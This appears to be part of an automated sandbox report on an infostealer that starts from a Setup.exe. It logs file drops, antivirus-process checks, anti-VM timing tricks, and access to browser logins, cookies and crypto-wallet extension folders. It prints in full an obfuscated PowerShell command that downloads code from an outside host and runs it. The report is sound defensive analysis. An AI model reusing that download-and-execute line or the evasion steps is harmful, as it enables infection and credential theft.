        Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: T0VC3MU5SNNFXQB43V5.exe.13.dr Static PE information: real checksum: 0x9307ce should be: 0x8615ed
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
        Source: T0VC3MU5SNNFXQB43V5.exe.13.dr Static PE information: section name: .didata
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.dr Static PE information: section name: .didata
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.dr Static PE information: section name: .didata
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04192C1F push esp; ret 17_2_04192C39
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04193655 push ebx; iretd 17_2_041936DA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04193645 push ebx; iretd 17_2_041936DA

        Persistence and Installation Behavior

        Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp File created: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp File created: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp File created: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-STFPD.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp File created: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe File created: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe File created: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
        Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com System information queried: FirmwareTableInformation
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe API/Special instruction interceptor: Address: 6BAD7C44
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BADF3E1 second address: 6BADF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BADF3FD second address: 6BADF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FC244FA7CE5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FC244FA7D70h 0x00000031 rdtsc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3815
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2733
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com TID: 4512 Thread sleep time: -150000s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208 Thread sleep count: 3815 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436 Thread sleep count: 2733 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\find.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\find.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe NtQuerySystemInformation: Direct from: 0x4585B0
        Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 811185
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Thousand
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "makes" Makes
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com M.com c
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Queries volume information: C:\Users\user\AppData\Local\Temp\e1128dc0 VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Code function: 49_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,49_2_00491486
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
        Source: find.exe, 00000028.00000002.3031064355.000001E1443CB000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000028.00000002.3031147529.000001E144664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        Source: Yara match File source: sslproxydump.pcap, type: PCAP
        Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: window-state.json
        Source: M.com, 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
        Source: powershell.exe, 00000011.00000002.2559366150.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
